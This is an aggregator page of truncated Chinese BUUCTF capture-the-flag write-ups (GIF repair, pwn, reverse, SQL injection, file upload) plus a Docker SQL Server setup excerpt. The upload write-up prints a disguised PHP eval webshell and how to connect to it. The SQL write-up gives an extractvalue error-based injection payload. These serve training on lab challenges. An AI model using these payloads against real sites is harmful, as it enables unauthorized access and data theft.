ctp

CTF-Misc-[BJDCTF2020]鸡你太美

喜你入骨 提交于 2020-08-06 02:07:29
CTF-Misc-[BJDCTF2020]鸡你太美 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Misc类,[BJDCTF2020]鸡你太美 思路 这类题目首先把文件下载下来,是一个gif 第一张能够打开,第二张打不开 使用bless 我是在linux下,当然你可以在windows下使用winhex 对比两张gif,找到了问题所在,第二张没有gif文件头,所以打不开 GIF文件头 47 49 46 38 ,直接给它加上,点击开始的数字直接编辑就好,然后保存 然后就可以打开了,发现flag(使用bless发现不能保存,然后使用010) 感谢 BUUCTF 以及勤劳的自己 来源: oschina 链接: https://my.oschina.net/guizimo/blog/4278168

使用Docker运行SQL Server

风格不统一 提交于 2020-07-28 19:55:23
现在.net core已经跨平台了,大家也都用上了linux用上了docker。跟.net经常配套使用的SQL SERVER以前一直是windows only,但是从SQL Server 2017开始已经支持运行在docker上,也就说现在SQL Serer已经可以运行在linux下了。 下面在Ubuntu 16.4上演示安装并使用SQL Server 2019-CTP3.2 SQL Server in Docker sudo docker pull mcr.microsoft.com/mssql/server:2019-CTP3.2-ubuntu 使用docker pull命令从docker hub拉取sqlserver 2019-ctp3.2的镜像 sudo mkdir /hd2/sqlserver2019_data sudo docker run -e "ACCEPT_EULA=Y" -e "SA_PASSWORD=dev@123," -p 14330:1433 --name sqlserver2019 -v /hd2/sqlserver2019_data:/var/opt/mssql -d mcr.microsoft.com/mssql/server:2019-CTP3.2-ubuntu 使用docker run 命令启动容器,其中要注意的是使用

CTF-Pwn-[BJDCTF 2nd]diff

我与影子孤独终老i 提交于 2020-05-08 14:06:24
CTF-Pwn-[BJDCTF 2nd]diff 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]diff 使用ssh远程连接Username: ctf Password: guest 思路 远程连接 ssh -p 29857 ctf@node3.buuoj.cn 可以看到里面有一个文件diff,我们把它下载下来这里使用ssh协议的scp scp -P 28708 ctf@node3.buuoj.cn:/home/ctf/diff /home/tanglei/Desktop/ctf/ 接下来我们来分析这个源文件 然后使用ida32位打开它 注意到compare函数里面有个漏洞 int __cdecl compare(int a1, int fd) { char v2; // al int v4; // [esp+0h] [ebp-80h] unsigned int i; // [esp+4h] [ebp-7Ch] char addr[120]; // [esp+8h] [ebp-78h] v4 = 0; JUMPOUT(sys_read(fd, buf1,

CTF-Reverse-[GXYCTF2019]luck_guy

对着背影说爱祢 提交于 2020-05-08 09:54:55
CTF-Reverse-[GXYCTF2019]luck_guy 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Reverse类,[GXYCTF2019]luck_guy 下载attachment.zip,里面有luck_guy文件 思路 分析文件file和checksec命令 使用ida64位打开,F5,这是基本流程了 main方法 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v4; // [rsp+14h] [rbp-Ch] unsigned __int64 v5; // [rsp+18h] [rbp-8h] v5 = __readfsqword(0x28u); welcome(*(_QWORD *)&argc, argv, envp); puts("_________________"); puts("try to patch me and

CTF-Reverse-[GXYCTF2019]luck_guy

天涯浪子 提交于 2020-05-07 20:46:19
CTF-Reverse-[GXYCTF2019]luck_guy 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Reverse类,[GXYCTF2019]luck_guy 下载attachment.zip,里面有luck_guy文件 思路 分析文件file和checksec命令 使用ida64位打开,F5,这是基本流程了 main方法 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v4; // [rsp+14h] [rbp-Ch] unsigned __int64 v5; // [rsp+18h] [rbp-8h] v5 = __readfsqword(0x28u); welcome(*(_QWORD *)&argc, argv, envp); puts("_________________"); puts("try to patch me and

CTF-Pwn-[BJDCTF 2nd]rci

狂风中的少年 提交于 2020-05-06 19:32:34
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]rci 下载rci文件 思路 老规矩使用file和checksec查看文件 全保! 程序可以执行两次system,第一次执行的时候在sh的工作目录位于/tmp下一个随机的文件夹,用 ls -t 来将最近生成的文件夹排序,后面输入文件路径时,用刚才得到的文件夹列表来尝试 nc连接 nc node3.buuoj.cn 28322 使 ls -ali 查看目录,当前目录文件用 . 表示,所以输入 ls -ali 命令即可显示当前目录的 inode 号,即1153751925 再打开一个shell,这次输入 ls -ali /tmp 显示/tmp目录下所有文件 inode ,根据唯一的 inode 找到对应房间号 可以把这些数据发到工具里面,然后查找就会快很多 拼接完整路径 /tmp/R0OM#1700638506 ,通过check1 输入 $0 ,通过check2 进入到根目录,有一个imagin,cat它,flag得到 感谢 BUUCTF 以及勤劳的自己 来源:

CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2

烈酒焚心 提交于 2020-05-06 15:35:10
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]ydsneedgirlfriend2 下载题目的文件 ydsneedgirlfriend2 思路 使用file命令查看,发现是64位的文件,使用ida64位打开 进入主函数,使用F5反编译后得到伪代码 // local variable allocation has failed, the output may be wrong! int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+12h] [rbp-Eh] unsigned __int64 v5; // [rsp+18h] [rbp-8h] v5 = __readfsqword(0x28u); myinit(*(_QWORD *)&argc, argv, envp); while ( 1 ) { while ( 1

CTF-Pwn-[BJDCTF 2nd]one_gadget

♀尐吖头ヾ 提交于 2020-05-06 14:59:00
CTF-Pwn-[BJDCTF 2nd]one_gadget 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]one_gadget 下载题目的文件 one_gadget 思路 使用file命令查看,发现是64位的文件,使用ida64位打开,如果是在mac15下打不开在终端输入 sudo xattr -rd com.apple.quarantine /Users/tanglei/Desktop/CTF/IDA\ Pro\ 7.0/ida64.app 后面是ida64.app的位置 使用ida64打开 进入主函数,使用F5反编译后得到伪代码,结果f5按不出来,还是用mac的 int __cdecl main(int argc, const char **argv, const char **envp) { void (*v4)(void); // [rsp+8h] [rbp-18h] void (*v5)(void); // [rsp+10h] [rbp-10h] unsigned __int64 v6; // [rsp+18h] [rbp-8h] v6 = _

CTF-Web-[极客大挑战 2019]FinalSQL

我怕爱的太早我们不能终老 提交于 2020-05-03 22:22:09
CTF-Web-[极客大挑战 2019]FinalSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]FinalSQL 打开题目的实例 思路 SQl的题目,首先试一试万能密码(虽然不可能,但是还是得试一下) 试一下双写 看来被封死了,想想其他的办法,可以使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23 看来是加强到最后一版本了,仔细查看它的提示,试一试盲注 盲注 试着写脚本,不用试着了,网上大神的脚本 # -*- coding: utf-8 -*- # @Author: jiaoben # @Date : 2020/05/03 import re import requests import string url = "http://dcf33d60

CTF-Web-[极客大挑战 2019]Upload

被刻印的时光 ゝ 提交于 2020-05-03 20:07:40
CTF-Web-[极客大挑战 2019]Upload 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]Upload 打开题目的实例 思路 做一个phtml的文件 将里面的内容改为一句话木马,为我们后面的蚁剑连接做准备 GIF89a <script language="php">eval($_POST['shell']);</script> 我们将它上传,使用bp截取,修改一下格式,再放行 蚁剑连接 我们使用蚁剑连接,猜测路径为upload /upload/test.phtml 完整路径 http://3cc0c310-5536-49f0-8e10-1aca744981b8.node3.buuoj.cn/upload/test.phtml 密码就是我们在一句话密码里面写的 shell 然后我们就进来了 像这样的话直接找根目录,发现flag 感谢 BUUCTF 以及勤劳的自己 来源: oschina 链接: https://my.oschina.net/u/4137262/blog/4263524